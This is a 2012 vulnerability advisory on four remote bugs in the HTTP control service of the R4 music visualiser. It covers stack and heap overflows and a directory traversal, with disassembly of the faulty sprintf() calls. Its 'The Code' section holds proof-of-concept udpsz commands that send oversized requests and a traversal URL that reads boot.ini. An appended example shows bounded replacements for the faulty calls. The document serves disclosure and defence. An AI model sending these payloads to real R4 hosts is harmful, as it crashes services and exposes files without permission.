#######################################################################

Luigi Auriemma

Application:  R4
              http://r4.rabidhamster.org/R4/
Versions:     <= 1.25
Platforms:    Windows
Bugs:         A] stack overflow
              B] heap overflow
              C] directory traversal
              D] screenshot stack overflow
Exploitation: remote
Date:         09 Feb 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"R4 is a standalone OpenGL accelerated program which aims to produce
animated 3D graphics in real-time that twist and turn with the music."

It is widely used at parties and other events that need 3D animations
driven by the music being played.

#######################################################################

=======
2) Bugs
=======

R4 has an HTTP service, disabled by default, that allows the program to
be controlled remotely; all the following vulnerabilities are located
in this component.

-----------------
A] stack overflow
-----------------

Stack-based buffer overflow caused by a call to sprintf() that builds a
log string from the HTTP arguments received from the client into a
2-kilobyte stack buffer:

0041ECD0 /$ 8B5424 04        MOV EDX,DWORD PTR SS:[ESP+4]
0041ECD4 |. 81EC 00080000    SUB ESP,800
0041ECDA |. 85D2             TEST EDX,EDX
0041ECDC |. 75 05            JNZ SHORT R4.0041ECE3
0041ECDE |. BA 349C4B00      MOV EDX,R4.004B9C34
0041ECE3 |> 8B8C24 08080000  MOV ECX,DWORD PTR SS:[ESP+808]
0041ECEA |. 85C9             TEST ECX,ECX
0041ECEC |. 75 05            JNZ SHORT R4.0041ECF3
0041ECEE |. B9 349C4B00      MOV ECX,R4.004B9C34
0041ECF3 |> 8B8424 0C080000  MOV EAX,DWORD PTR SS:[ESP+80C]
0041ECFA |. 85C0             TEST EAX,EAX
0041ECFC |. 74 2E            JE SHORT R4.0041ED2C
0041ECFE |. 53               PUSH EBX
0041ECFF |. 8A18             MOV BL,BYTE PTR DS:[EAX]
0041ED01 |. 84DB             TEST BL,BL
0041ED03 |. 5B               POP EBX
0041ED04 |. 74 26            JE SHORT R4.0041ED2C
0041ED06 |. 50               PUSH EAX
0041ED07 |. 51               PUSH ECX
0041ED08 |. 52               PUSH EDX
0041ED09 |. 8D4424 0C        LEA EAX,DWORD PTR SS:[ESP+C]
0041ED0D |. 68 60654B00      PUSH R4.004B6560                 ; "]%s>%s [%s]"
0041ED12 |. 50               PUSH EAX                         ; stack buffer
0041ED13 |. E8 7B3C0000      CALL R4.00422993                 ; sprintf()
0041ED18 |. 83C4 14          ADD ESP,14
0041ED1B |. 8D5424 00        LEA EDX,DWORD PTR SS:[ESP]
0041ED1F |. 52               PUSH EDX
0041ED20 |. E8 2BFEFFFF      CALL R4.0041EB50
0041ED25 |. 81C4 04080000    ADD ESP,804
0041ED2B |. C3               RETN

----------------
B] heap overflow
----------------

Heap overflow/corruption caused by a long HTTP URI.

----------------------
C] directory traversal
----------------------

Directory traversal exploitable through the "loadfile" script command,
which can be executed from left_console.html and allows viewing any
file on the disk where the software is installed.

----------------------------
D] screenshot stack overflow
----------------------------

Stack overflow through the "miniscreenshot" command:

0040B980  . 8B5424 04        MOV EDX,DWORD PTR SS:[ESP+4]
0040B984  . 81EC 04010000    SUB ESP,104
...
0040BA1F  . 8B15 109C4B00    MOV EDX,DWORD PTR DS:[4B9C10]
0040BA25  . 56               PUSH ESI
0040BA26  . 52               PUSH EDX
0040BA27  . 8D4424 14        LEA EAX,DWORD PTR SS:[ESP+14]
0040BA2B  . 68 F02A4B00      PUSH R4.004B2AF0                 ; "%s/scene/%s.jpg"
0040BA30  . 50               PUSH EAX                         ; stack buffer
0040BA31  . E8 5D6F0100      CALL R4.00422993                 ; sprintf()

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

A] udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000

B] udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000

C] http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])

D] udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
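Added example, not part of the advisory or of R4: the hardened form of the sprintf() pattern behind bugs A and D, written for both of them at once. The only facts taken from the advisory are the two format strings and the two stack buffer sizes (0x800 and 0x104 from the SUB ESP instructions); the function names, the "" substitute for NULL arguments and the test inputs are this example's own assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stack buffer sizes taken from the SUB ESP instructions in the advisory. */
#define LOG_BUF_SIZE        0x800   /* bug A: "]%s>%s [%s]" */
#define SCREENSHOT_BUF_SIZE 0x104   /* bug D: "%s/scene/%s.jpg" */

/* Bounded replacement for the unbounded sprintf() calls: returns 0 when the
 * string fits in out[outsz], else empties out and returns -1 (the overrun case). */
static int bounded_format(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap; int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Bug A: the log line. NULL arguments map to "" here, as the original code
 * maps them to a default string before calling sprintf(). */
static int format_log_line(char *out, size_t outsz,
                           const char *a, const char *b, const char *c)
{
    return bounded_format(out, outsz, "]%s>%s [%s]",
                          a ? a : "", b ? b : "", c ? c : "");
}

/* Bug D: the screenshot path built from the scene directory and the name. */
static int format_screenshot_path(char *out, size_t outsz,
                                  const char *dir, const char *name)
{
    return bounded_format(out, outsz, "%s/scene/%s.jpg", dir, name);
}

/* Runs format_log_line() with a constructed argument of `len` 'a' bytes into
 * a LOG_BUF_SIZE stack buffer and returns its result (-2 if len is too big). */
static int log_line_with_arg_len(size_t len)
{
    static char arg[4096];
    char buf[LOG_BUF_SIZE];
    if (len >= sizeof arg) return -2;
    memset(arg, 'a', len);
    arg[len] = '\0';
    return format_log_line(buf, sizeof buf, "GET", arg, "client");
}
```

With "GET" and "client" as the fixed arguments the log line carries 14 bytes besides the middle argument, so the last length that still fits the 2048-byte buffer is 2033 and 2034 is the first one rejected.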